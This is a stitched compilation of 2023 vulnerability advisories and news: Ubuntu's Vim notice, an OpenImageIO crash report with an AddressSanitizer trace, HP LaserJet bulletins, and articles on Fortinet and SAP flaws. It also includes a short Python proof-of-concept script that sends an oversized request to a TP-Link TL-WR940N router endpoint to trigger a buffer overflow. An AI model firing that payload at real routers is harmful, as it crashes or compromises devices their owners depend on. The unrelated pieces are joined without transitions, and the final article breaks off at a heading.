Ubuntu Security Notice 6195-1 - It was discovered that Vim contained an out-of-bounds read vulnerability. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code. It was discovered that Vim did not properly manage memory when freeing allocated memory. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code. It was discovered that Vim contained a heap-based buffer overflow vulnerability. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6195-1  
July 03, 2023

vim vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in Vim.

Software Description:  
- vim: Vi IMproved - enhanced vi editor

Details:

It was discovered that Vim contained an out-of-bounds read vulnerability.  
An attacker could possibly use this issue to cause a denial of service or  
execute arbitrary code. (CVE-2022-0128)

It was discovered that Vim did not properly manage memory when freeing  
allocated memory. An attacker could possibly use this issue to cause a  
denial of service or execute arbitrary code. (CVE-2022-0156)

It was discovered that Vim contained a heap-based buffer overflow  
vulnerability. An attacker could possibly use this issue to cause a denial  
of service or execute arbitrary code. (CVE-2022-0158)

It was discovered that Vim did not properly manage memory when recording  
and using select mode. An attacker could possibly use this issue to cause  
a denial of service. (CVE-2022-0393)

It was discovered that Vim incorrectly handled certain memory operations  
during a visual block yank. An attacker could possibly use this issue to  
cause a denial of service or execute arbitrary code. (CVE-2022-0407)

It was discovered that Vim contained a NULL pointer dereference  
vulnerability when switching tabpages. An attacker could possible use this  
issue to cause a denial of service. (CVE-2022-0696)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   vim                             2:8.2.3995-1ubuntu2.9  
   vim-athena                      2:8.2.3995-1ubuntu2.9  
   vim-gtk3                        2:8.2.3995-1ubuntu2.9  
   vim-nox                         2:8.2.3995-1ubuntu2.9  
   vim-tiny                        2:8.2.3995-1ubuntu2.9  
   xxd                             2:8.2.3995-1ubuntu2.9

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6195-1  
   CVE-2022-0128, CVE-2022-0156, CVE-2022-0158, CVE-2022-0393,  
   CVE-2022-0407, CVE-2022-0696

Package Information:  
   https://launchpad.net/ubuntu/+source/vim/2:8.2.3995-1ubuntu2.9

Ubuntu Security Notice USN-6195-1

TP-Link TL-WR940N version 4 suffers from a buffer overflow vulnerability.

    # Exploit Title: TP-Link TL-WR940N V4 - Buffer OverFlow# Date: 2023-06-30# country: Iran# Exploit Author: Amirhossein Bahramizadeh# Category : hardware# Dork : /userRpm/WanDynamicIpV6CfgRpm# Tested on: Windows/Linux# CVE : CVE-2023-36355import requests# Replace the IP address with the router's IProuter_ip = '192.168.0.1'# Construct the URL with the vulnerable endpoint and parameterurl = f'http://{router_ip}/userRpm/WanDynamicIpV6CfgRpm?ipStart='# Replace the payload with a crafted payload that triggers the buffer overflowpayload = 'A' * 5000  # Example payload, adjust the length as needed# Send the GET request with the crafted payloadresponse = requests.get(url + payload)# Check the response status codeif response.status_code == 200:    print('Buffer overflow triggered successfully')else:    print('Buffer overflow not triggered')

TP-Link TL-WR940N 4 Buffer Overflow

Buffer Overflow vulnerability in OpenImageIO v.2.4.12.0 and before allows a remote to execute arbitrary code and obtain sensitive information via a crafted file to the readimg function.

Describe the bug:  
Hi, I found heap-buffer-overflow in function ICOInput::readimg in file src/ico.imageio/icoinput.cpp

To Reproduce:  
Steps to reproduce the behavior:

1.  CC=afl-clang-fast CXX=afl-clang-fast++ CFLAGS="-gdwarf-2 -g3 -O0 -fsanitize=address -fno-omit-frame-pointer" CXXFLAGS="-gdwarf-2 -g3 -O0 -fsanitize=address -fno-omit-frame-pointer" LDFLAGS="-fsanitize=address" cmake .. -DCMAKE\_CXX\_STANDARD=17
2.  make && make install
3.  iconvert poc /tmp/res

poc file:  
poc1.zip

Evidence:  
\==617==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000a602 at pc 0x7f30d95a9823 bp 0x7ffc9cd71f10 sp 0x7ffc9cd71f08  
READ of size 1 at 0x60200000a602 thread T0  
#0 0x7f30d95a9822 in OpenImageIO\_v2\_4::ICOInput::readimg() /root/github/oiio-2.4.11.0\_1/src/ico.imageio/icoinput.cpp:326:36  
#1 0x7f30d95aa6c2 in OpenImageIO\_v2\_4::ICOInput::read\_native\_scanline(int, int, int, int, void\*) /root/github/oiio-2.4.11.0\_1/src/ico.imageio/icoinput.cpp:429:14  
#2 0x7f30d90fd4e0 in OpenImageIO\_v2\_4::ImageInput::read\_native\_scanlines(int, int, int, int, int, void\*) /root/github/oiio-2.4.11.0\_1/src/libOpenImageIO/imageinput.cpp:399:19  
#3 0x7f30d90fd9c2 in OpenImageIO\_v2\_4::ImageInput::read\_native\_scanlines(int, int, int, int, int, int, int, void\*) /root/github/oiio-2.4.11.0\_1/src/libOpenImageIO/imageinput.cpp:420:16  
#4 0x7f30d90fad9e in OpenImageIO\_v2\_4::ImageInput::read\_scanlines(int, int, int, int, int, int, int, OpenImageIO\_v2\_4::TypeDesc, void\*, long, long) /root/github/oiio-2.4.11.0\_1/src/libOpenImageIO/imageinput.cpp:336:15  
#5 0x7f30d9109c51 in OpenImageIO\_v2\_4::ImageInput::read\_image(int, int, int, int, OpenImageIO\_v2\_4::TypeDesc, void\*, long, long, long, bool (_)(void_, float), void\*) /root/github/oiio-2.4.11.0\_1/src/libOpenImageIO/imageinput.cpp:967:23  
#6 0x7f30d9197dd7 in OpenImageIO\_v2\_4::ImageOutput::copy\_image(OpenImageIO\_v2\_4::ImageInput\*) /root/github/oiio-2.4.11.0\_1/src/libOpenImageIO/imageoutput.cpp:588:19  
#7 0x5620dac9426c in convert\_file(std::\_\_cxx11::basic\_string<char, std::char\_traits, std::allocator > const&, std::\_\_cxx11::basic\_string<char, std::char\_traits, std::allocator > const&) /root/github/oiio-2.4.11.0\_1/src/iconvert/iconvert.cpp:449:27  
#8 0x5620dac99221 in main /root/github/oiio-2.4.11.0\_1/src/iconvert/iconvert.cpp:523:14  
#9 0x7f30d6b32d8f (/lib/x86\_64-linux-gnu/libc.so.6+0x29d8f) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d)  
#10 0x7f30d6b32e3f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x29e3f) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d)  
#11 0x5620dabd1054 in \_start (/root/github/oiio-2.4.11.0\_1/dist/bin/iconvert+0x28054) (BuildId: dee6af2e834643e5fa1ac02b9cc829ac746f39a2)

0x60200000a602 is located 10 bytes to the right of 8-byte region \[0x60200000a5f0,0x60200000a5f8)  
allocated by thread T0 here:  
#0 0x5620dac8ec6d in operator new(unsigned long) (/root/github/oiio-2.4.11.0\_1/dist/bin/iconvert+0xe5c6d) (BuildId: dee6af2e834643e5fa1ac02b9cc829ac746f39a2)  
#1 0x7f30d95a7924 in \_\_gnu\_cxx::new\_allocator::allocate(unsigned long, void const\*) /usr/lib/gcc/x86\_64-linux-gnu/11/../../../../include/c++/11/ext/new\_allocator.h:127:27  
#2 0x7f30d95a7924 in std::allocator\_traits<std::allocator >::allocate(std::allocator&, unsigned long) /usr/lib/gcc/x86\_64-linux-gnu/11/../../../../include/c++/11/bits/alloc\_traits.h:464:20  
#3 0x7f30d95a7924 in std::\_Vector\_base<unsigned char, std::allocator >::\_M\_allocate(unsigned long) /usr/lib/gcc/x86\_64-linux-gnu/11/../../../../include/c++/11/bits/stl\_vector.h:346:20  
#4 0x7f30d95a7924 in std::\_Vector\_base<unsigned char, std::allocator >::\_M\_create\_storage(unsigned long) /usr/lib/gcc/x86\_64-linux-gnu/11/../../../../include/c++/11/bits/stl\_vector.h:361:33  
#5 0x7f30d95a7924 in std::\_Vector\_base<unsigned char, std::allocator >::\_Vector\_base(unsigned long, std::allocator const&) /usr/lib/gcc/x86\_64-linux-gnu/11/../../../../include/c++/11/bits/stl\_vector.h:305:9  
#6 0x7f30d95a7924 in std::vector<unsigned char, std::allocator >::vector(unsigned long, std::allocator const&) /usr/lib/gcc/x86\_64-linux-gnu/11/../../../../include/c++/11/bits/stl\_vector.h:511:9  
#7 0x7f30d95a7924 in OpenImageIO\_v2\_4::ICOInput::readimg() /root/github/oiio-2.4.11.0\_1/src/ico.imageio/icoinput.cpp:308:32  
#8 0x7f30d95aa6c2 in OpenImageIO\_v2\_4::ICOInput::read\_native\_scanline(int, int, int, int, void\*) /root/github/oiio-2.4.11.0\_1/src/ico.imageio/icoinput.cpp:429:14  
#9 0x7f30d90fd4e0 in OpenImageIO\_v2\_4::ImageInput::read\_native\_scanlines(int, int, int, int, int, void\*) /root/github/oiio-2.4.11.0\_1/src/libOpenImageIO/imageinput.cpp:399:19  
#10 0x7f30d90fd9c2 in OpenImageIO\_v2\_4::ImageInput::read\_native\_scanlines(int, int, int, int, int, int, int, void\*) /root/github/oiio-2.4.11.0\_1/src/libOpenImageIO/imageinput.cpp:420:16  
#11 0x7f30d90fad9e in OpenImageIO\_v2\_4::ImageInput::read\_scanlines(int, int, int, int, int, int, int, OpenImageIO\_v2\_4::TypeDesc, void\*, long, long) /root/github/oiio-2.4.11.0\_1/src/libOpenImageIO/imageinput.cpp:336:15  
#12 0x7f30d9109c51 in OpenImageIO\_v2\_4::ImageInput::read\_image(int, int, int, int, OpenImageIO\_v2\_4::TypeDesc, void\*, long, long, long, bool (_)(void_, float), void\*) /root/github/oiio-2.4.11.0\_1/src/libOpenImageIO/imageinput.cpp:967:23  
#13 0x7f30d9197dd7 in OpenImageIO\_v2\_4::ImageOutput::copy\_image(OpenImageIO\_v2\_4::ImageInput\*) /root/github/oiio-2.4.11.0\_1/src/libOpenImageIO/imageoutput.cpp:588:19  
#14 0x5620dac9426c in convert\_file(std::\_\_cxx11::basic\_string<char, std::char\_traits, std::allocator > const&, std::\_\_cxx11::basic\_string<char, std::char\_traits, std::allocator > const&) /root/github/oiio-2.4.11.0\_1/src/iconvert/iconvert.cpp:449:27  
#15 0x5620dac99221 in main /root/github/oiio-2.4.11.0\_1/src/iconvert/iconvert.cpp:523:14  
#16 0x7f30d6b32d8f (/lib/x86\_64-linux-gnu/libc.so.6+0x29d8f) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d)

SUMMARY: AddressSanitizer: heap-buffer-overflow /root/github/oiio-2.4.11.0\_1/src/ico.imageio/icoinput.cpp:326:36 in OpenImageIO\_v2\_4::ICOInput::readimg()  
Shadow bytes around the buggy address:  
0x0c047fff9470: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd  
0x0c047fff9480: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd  
0x0c047fff9490: fa fa fd fd fa fa fd fa fa fa 02 fa fa fa 00 07  
0x0c047fff94a0: fa fa 00 fa fa fa 00 fa fa fa fd fa fa fa fd fa  
0x0c047fff94b0: fa fa fd fa fa fa fd fa fa fa 00 00 fa fa 00 fa  
\=>0x0c047fff94c0:\[fa\]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c047fff94d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c047fff94e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c047fff94f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c047fff9500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c047fff9510: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
Shadow byte legend (one shadow byte represents 8 application bytes):  
Addressable: 00  
Partially addressable: 01 02 03 04 05 06 07  
Heap left redzone: fa  
Freed heap region: fd  
Stack left redzone: f1  
Stack mid redzone: f2  
Stack right redzone: f3  
Stack after return: f5  
Stack use after scope: f8  
Global redzone: f9  
Global init order: f6  
Poisoned by user: f7  
Container overflow: fc  
Array cookie: ac  
Intra object redzone: bb  
ASan internal: fe  
Left alloca redzone: ca  
Right alloca redzone: cb  
\==617==ABORTING

Platform information:  
OIIO branch/version: 2.4.12  
OS: Linux  
C++ compiler: clang-14.0.6

CVE-2023-36183: [BUG] Heap-buffer-overflow in function ICOInput::readimg in file src/ico.imageio/icoinput.cpp · Issue #3871 · OpenImageIO/oiio

Buffer Overflow vulnerability in mtrojnar osslsigncode v.2.3 and before allows a local attacker to execute arbitrary code via a crafted .exe, .sys, and .dll files.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

*   Notifications
*   Fork 112

*   Code
*   Issues 7
*   Pull requests 2
*   Actions
*   Projects
*   Security
*   Insights

Permalink

**Comparing changes**

Choose two branches to see what’s changed or to start a new pull request. If you need to, you can also .

**Open a pull request**

Create a new pull request by comparing changes across two branches. If you need to, you can also .

_base repository:_ mtrojnar/osslsigncode _base:_ 2.2

_head repository:_ mtrojnar/osslsigncode _compare:_ 2.3

CVE-2023-36377: Comparing 2.2...2.3 · mtrojnar/osslsigncode

Some 340,000 FortiGate SSL VPN appliances remain exposed to the threat more than three weeks after Fortinet released firmware updates to address the issue.

Researchers have written exploit code for a critical remote code execution (RCE) vulnerability in Fortinet's FortiGate SSL VPNs that the vendor disclosed and patched in June 2023.

Bishop Fox's research team, which developed the exploit, has estimated there are some 340,000 affected FortiGate devices that are currently unpatched against the flaw and remain open to attack. That number is significantly higher than the 250,000 FortiGate devices that several researchers estimated were vulnerable to exploit when Fortinet first disclosed the flaw on June 12.

**Code Not Released Publicly — but There's a GIF**

"There are 490,000 affected \[FortiGate\] SSL VPN interfaces exposed on the internet, and roughly 69% of them are currently unpatched," Bishop Fox's director of capability development, Caleb Gross, wrote in a blog post on June 30. "You should patch yours now."

The heap-based buffer overflow vulnerability, tracked as CVE-2023-27997, affects multiple versions of FortiOS and FortiProxy SSL-VPN software. It gives an unauthenticated, remote attacker a way to execute arbitrary code on an affected device and take complete control of it. Researchers from French cybersecurity firm Lexfo who discovered the flaw assessed it as affecting every single SSL VPN appliance running FortiOS.

Bishop Fox has not released its exploit code publicly. But its blog post has a GIF of it in use. Gross described the exploit that Bishop Fox has developed as giving attackers a way to open an interactive shell they could use to communicate with an affected FortiGate appliance.

"This exploit very closely follows the steps detailed in the original blog post by Lexfo, though we had to take a few extra steps that were not mentioned in that post," Gross wrote. "The exploit runs in approximately one second, which is significantly faster than the demo video on a 64-bit device shown by Lexfo."

Fortinet issued firmware updates that addressed the issue on June 12. At the time, the company said the flaw affected organizations in government, manufacturing and other critical infrastructure sectors. Fortinet said it was aware of an attacker exploiting the vulnerability in a limited number of cases.

Fortinet cautioned about the potential for threat actors like those behind the Volt Typhoon cyber-espionage campaign to abuse CVE-2023-27997. Volt Typhoon is a China-based group that is believed to have established persistent access on networks belonging to US telecom companies and other critical infrastructure organizations, for stealing sensitive data and carrying out other malicious actions. The campaign so far has primarily used another, older Fortinet flaw (CVE-2022-40684) for initial access. But organizations should not discount the possibility of Volt Typhoon — and other threat actors — using CVE-2023-27997 either, Fortinet warned.

**Why Security Appliances Make Popular Targets**

CVE-2023-27997 is one of numerous critical Fortinet vulnerabilities that have been exposed. Like that of almost every other firewall and VPN vendor, Fortinet's appliances are a popular target for adversaries because of the access they provide to enterprise networks.

The US Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), and others have issued multiple advisories in recent years about the need for organizations to promptly address vulnerabilities in these and other network devices because of the high attacker interest in them.

In June 2022, for instance, CISA warned of China-sponsored threat actors actively targeting unpatched vulnerabilities in network devices from a wide range of vendors. The advisory included a list of the most common of these vulnerabilities. The list included vulnerabilities in products from Fortinet, Cisco, Citrix, Netgear, Pulse, QNAP, and Zyxel.

Systems administrators should patch as quickly as possible, even though patching firmware can be a bit more cumbersome when dealing with appliances that run application gateways, says Timothy Morris, chief security adviser at Tanium. Often, appliances such as those from Fortinet face the perimeter and have very high-availability requirements, meaning they have tight windows for change.

"For most organizations, a certain amount of downtime is probably inevitable," Morris says. Vulnerabilities such as CVE-2023-27997 require the full firmware image to be reloaded, so there is a certain amount of time and risk involved, he adds. "Configurations have to be backed up and restored to make sure they are working as expected."

Researchers Develop Exploit Code for Critical Fortinet VPN Bug

Certain HP LaserJet Pro print products are potentially vulnerable to Buffer Overflow and/or Denial of Service when using the backup & restore feature through the embedded web service on the device.

**hp-concentra-wrapper-portlet**

 Actions

Certain HP LaserJet Pro print products are potentially vulnerable to Buffer Overflow and/or Denial of Service when using the backup & restore feature through the embedded web service on the device.

Severity

High

HP Reference

HPSBPI03852 rev.01

Release date

June 22, 2023

Last updated

June 22, 2023

Category

Print

Potential Security Impact

Potential Buffer Overflow, Denial of Service

**Relevant Common Vulnerabilities and Exposures (CVE) List**

**Reported by:** hoangha2 (ZDI-CAN-19693)

List of CVE IDs    

CVE ID

CVSS

Severity

Vector

CVE-2023-35176

8.8

High

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Learn more about CVSS 3.0 base metrics, which range from 0 to 10.

PSR-2023-0059

**Resolution**

Update the printer firmware.

HP has provided an updated firmware resolution for potentially affected products listed in the table below. To obtain the updated firmware, go to the HP Customer Support - Software and Driver Downloads, and then search for your printer model.

**Affected LaserJet Pro printers**

Find the products affected and the firmware version that resolves the vulnerabilities.

Affected products    

Product Name

Product Number

Updated Firmware Version

HP Color LaserJet MFP M478-M479 series

W1A75A, W1A76A, W1A77A, W1A81A, W1A82A, W1A79A, W1A80A, W1A78A

002\_2322C or higher

HP Color LaserJet Pro M453-M454 series

W1Y40A, W1Y41A, W1Y46A, W1Y47A, W1Y44A, W1Y45A, W1Y43A

002\_2322C or higher

HP LaserJet Pro M304-M305 Printer series

W1A66A, W1A46A, W1A47A, W1A48A

002\_2322C or higher

HP LaserJet Pro M404-M405 Printer series

W1A51A, W1A53A, W1A56A, W1A63A, W1A52A, 93M22A, W1A58A, W1A59A, W1A60A, W1A57A

002\_2322C or higher

HP LaserJet Pro MFP M428-M429 f series

W1A29A, W1A32A, W1A30A, W1A38A, W1A34A, W1A35A

002\_2322C or higher

HP LaserJet Pro MFP M428-M429 series

W1A28A, W1A31A, W1A33A

002\_2322C or higher

**Revision history**

This document has been revised according to the information below.

List of versions   

Version

Description

Date

1

Initial Release

June 22, 2023

**Additional information**

Follow these links for additional information.

Third-party security patches

Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support

For issues about implementing the recommendations of this Security Bulletin, visit http://www.hp.com/go/contacthp to learn about your HP support options.

Report

To report a potential security vulnerability with any HP supported product, send email to: hp-security-alert@hp.com.

Subscribe

To initiate a subscription to receive future HP Security Bulletin alerts via email, visit https://h41369.www4.hp.com/alerts-signup.php?lang=en&cc=US&jumpid=hpsc\_profile.

Security bulletin archive

To view released Security Bulletins, visit https://support.hp.com/security-bulletins.

It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.

Download HP’s security-alert PGP key

**Legal information**

System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Security Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Security Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.

© Copyright 2023 HP Development Company, L.P.

HP Inc. (HP) shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP nor its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. "HP Inc.," "HP" and the names of HP products referenced herein are trademarks of HP Inc. or its affiliates in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

CVE-2023-35176: Certain HP LaserJet Pro Print Products – Potential Buffer Overflow and/or Denial of Service

Certain HP LaserJet Pro print products are potentially vulnerable to a stack-based buffer overflow related to the compact font format parser.

**hp-concentra-wrapper-portlet**

 Actions

Certain HP LaserJet Pro print products are potentially vulnerable to a stack-based buffer overflow related to the compact font format parser.

Severity

High

HP Reference

HPSBPI03853 rev.01

Release date

June 22, 2023

Last updated

June 22, 2023

Category

Print

Potential Security Impact

Potential Buffer Overflow, Denial of Service

**Relevant Common Vulnerabilities and Exposures (CVE) List**

**Reported by:** Interrupt Labs (ZDI-CAN-19707)

List of CVE IDs    

CVE ID

CVSS

Severity

Vector

CVE-2023-35177

8.8

High

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Learn more about CVSS 3.0 base metrics, which range from 0 to 10.

PSR-2023-0060

**Resolution**

Update the printer firmware.

HP has provided an updated firmware resolution for potentially affected products listed in the table below. To obtain the updated firmware, go to the HP Customer Support - Software and Driver Downloads, and then search for your printer model.

**Affected LaserJet Pro printers**

Find the products affected and the firmware version that resolves the vulnerabilities.

Affected products    

Product Name

Product Number

Updated Firmware Version

HP Color LaserJet MFP M478-M479 series

W1A75A, W1A76A, W1A77A, W1A81A, W1A82A, W1A79A, W1A80A, W1A78A

002\_2322C or higher

HP Color LaserJet Pro M453-M454 series

W1Y40A, W1Y41A, W1Y46A, W1Y47A, W1Y44A, W1Y45A, W1Y43A

002\_2322C or higher

HP LaserJet Pro M304-M305 Printer series

W1A66A, W1A46A, W1A47A, W1A48A

002\_2322C or higher

HP LaserJet Pro M404-M405 Printer series

W1A51A, W1A53A, W1A56A, W1A63A, W1A52A, 93M22A, W1A58A, W1A59A, W1A60A, W1A57A

002\_2322C or higher

HP LaserJet Pro MFP M428-M429 f series

W1A29A, W1A32A, W1A30A, W1A38A, W1A34A, W1A35A

002\_2322C or higher

HP LaserJet Pro MFP M428-M429 series

W1A28A, W1A31A, W1A33A

002\_2322C or higher

**Revision history**

This document has been revised according to the information below.

List of versions   

Version

Description

Date

1

Initial Release

June 22, 2023

**Additional information**

Follow these links for additional information.

Third-party security patches

Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support

For issues about implementing the recommendations of this Security Bulletin, visit http://www.hp.com/go/contacthp to learn about your HP support options.

Report

To report a potential security vulnerability with any HP supported product, send email to: hp-security-alert@hp.com.

Subscribe

To initiate a subscription to receive future HP Security Bulletin alerts via email, visit https://h41369.www4.hp.com/alerts-signup.php?lang=en&cc=US&jumpid=hpsc\_profile.

Security bulletin archive

To view released Security Bulletins, visit https://support.hp.com/security-bulletins.

It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.

Download HP’s security-alert PGP key

**Legal information**

System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Security Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Security Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.

© Copyright 2023 HP Development Company, L.P.

HP Inc. (HP) shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP nor its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. "HP Inc.," "HP" and the names of HP products referenced herein are trademarks of HP Inc. or its affiliates in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

CVE-2023-35177: Certain HP LaserJet Pro Print Products - Potential Buffer Overflow

Certain HP LaserJet Pro print products are potentially vulnerable to Buffer Overflow when performing a GET request to scan jobs.

**hp-concentra-wrapper-portlet**

 Actions

Certain HP LaserJet Pro print products are potentially vulnerable to Buffer Overflow when performing a GET request to scan jobs.

Severity

High

HP Reference

HPSBPI03854 rev.01

Release date

June 22, 2023

Last updated

June 22, 2023

Category

Print

Potential Security Impact

Potential Buffer Overflow, Denial of Service

**Relevant Common Vulnerabilities and Exposures (CVE) List**

**Reported by:** Bugscale (ZDI-CAN-19765)

List of CVE IDs    

CVE ID

CVSS

Severity

Vector

CVE-2023-35178

8.8

High

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Learn more about CVSS 3.0 base metrics, which range from 0 to 10.

PSR-2023-0061

**Resolution**

Update the printer firmware.

HP has provided an updated firmware resolution for potentially affected products listed in the table below. To obtain the updated firmware, go to the HP Customer Support - Software and Driver Downloads, and then search for your printer model.

**Affected LaserJet Pro printers**

Find the products affected and the firmware version that resolves the vulnerabilities.

Affected products    

Product Name

Product Number

Updated Firmware Version

HP Color LaserJet MFP M478-M479 series

W1A75A, W1A76A, W1A77A, W1A81A, W1A82A, W1A79A, W1A80A, W1A78A

002\_2322C or higher

HP Color LaserJet Pro M453-M454 series

W1Y40A, W1Y41A, W1Y46A, W1Y47A, W1Y44A, W1Y45A, W1Y43A

002\_2322C or higher

HP LaserJet Pro M304-M305 Printer series

W1A66A, W1A46A, W1A47A, W1A48A

002\_2322C or higher

HP LaserJet Pro M404-M405 Printer series

W1A51A, W1A53A, W1A56A, W1A63A, W1A52A, 93M22A, W1A58A, W1A59A, W1A60A, W1A57A

002\_2322C or higher

HP LaserJet Pro MFP M428-M429 f series

W1A29A, W1A32A, W1A30A, W1A38A, W1A34A, W1A35A

002\_2322C or higher

HP LaserJet Pro MFP M428-M429 series

W1A28A, W1A31A, W1A33A

002\_2322C or higher

**Revision history**

This document has been revised according to the information below.

List of versions   

Version

Description

Date

1

Initial Release

June 22, 2023

**Additional information**

Follow these links for additional information.

Third-party security patches

Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support

For issues about implementing the recommendations of this Security Bulletin, visit http://www.hp.com/go/contacthp to learn about your HP support options.

Report

To report a potential security vulnerability with any HP supported product, send email to: hp-security-alert@hp.com.

Subscribe

To initiate a subscription to receive future HP Security Bulletin alerts via email, visit https://h41369.www4.hp.com/alerts-signup.php?lang=en&cc=US&jumpid=hpsc\_profile.

Security bulletin archive

To view released Security Bulletins, visit https://support.hp.com/security-bulletins.

It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.

Download HP’s security-alert PGP key

**Legal information**

System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Security Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Security Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.

© Copyright 2023 HP Development Company, L.P.

HP Inc. (HP) shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP nor its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. "HP Inc.," "HP" and the names of HP products referenced herein are trademarks of HP Inc. or its affiliates in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

CVE-2023-35178: Certain HP LaserJet Pro Print Products - Potential Buffer Overflow

Patches are available for three bugs, but with technical details and PoCs now available, threat actors can craft targeted attacks.

Organizations running business-critical applications on SAP's Application Server for ABAP platform technology may want to read and heed details of a technical paper presented at Trooper's cybersecurity conference in Germany this week.

The paper, from research firm SEC Consult, provides technical details and proof-of-concept (PoC) code for four critical vulnerabilities in the server-side implementation of the Remote Function Call (RFC) communications interface in all releases and versions of SAP's NetWeaver Application Server ABAP and ABAP platform (AS ABAP).

**ABAP Kernel Affected By At Least One Of the Flaws**

The vulnerabilities give attackers a way to remotely execute arbitrary code on affected systems, access critical data, move laterally to other SAP systems on the same network, and execute other malicious actions. At least one of the flaws exists in the ABAP kernel, meaning a very large number of SAP products are affected.

"Remote unauthenticated attackers may exploit the identified issues to take full control of vulnerable application servers. This could result in a full compromise of confidentiality, integrity, and availability of data," SEC Consult said in a note to customers warning about the issues; it also shared the warning with Dark Reading.

Researchers at SEC Consult discovered and reported the vulnerabilities to SAP over the last two years. They identified the first one at the end of 2020 and the last one earlier this year. SAP issued patches for each of the identified issues soon after SEC Consult reported them to the company. Even so, SEC Consult waited till now to disclose technical details of the flaws to ensure SAP had enough time to properly address the issues.

"The identified vulnerabilities affected many different SAP products as the ABAP kernel was affected," says Johannes Greil, head of the SEC Consult Vulnerability Lab. "Hence profound work needed to be done to mitigate and test/verify the fixes for all of those products."

With technical details and proofs of concept (PoCs) for the flaws now becoming available, threat actors have information to craft targeted attacks, he says. So unpatched systems could pose a risk for organizations. "Our advice is — if it was not already done — to implement the patches and necessary configuration changes immediately as the issues are of critical risk," Greil notes. "Because of the high business risk, we also informed many customers already a few months ago in March 2023 and urged them to patch."

**Details On the Four Bugs**

